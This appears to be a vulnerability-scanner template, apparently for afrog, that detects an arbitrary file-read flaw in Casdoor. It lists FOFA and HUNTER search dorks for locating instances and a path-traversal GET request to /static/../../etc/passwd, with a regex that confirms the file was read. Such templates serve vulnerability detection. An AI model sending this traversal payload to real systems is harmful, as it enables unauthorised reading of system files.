漏洞描述
HUNTER: web.title="Casdoor"
FOFA: title="Casdoor"
id: casdoor-static-fileread
info:
name: Casdoor 任意文件读取漏洞
author: zan8in
severity: high
verified: true
description: |-
HUNTER: web.title="Casdoor"
FOFA: title="Casdoor"
tags: casdoor,fileread
created: 2023/10/11
rules:
r0:
request:
method: GET
path: /static/../../../../../../../../../../../etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()